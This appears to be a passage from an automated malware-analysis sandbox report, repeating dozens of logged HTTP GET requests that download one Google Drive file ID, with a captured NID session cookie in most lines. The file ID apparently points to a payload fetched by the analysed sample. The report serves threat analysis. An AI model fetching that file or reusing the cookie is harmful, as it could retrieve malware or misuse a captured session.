      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global traffic HTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
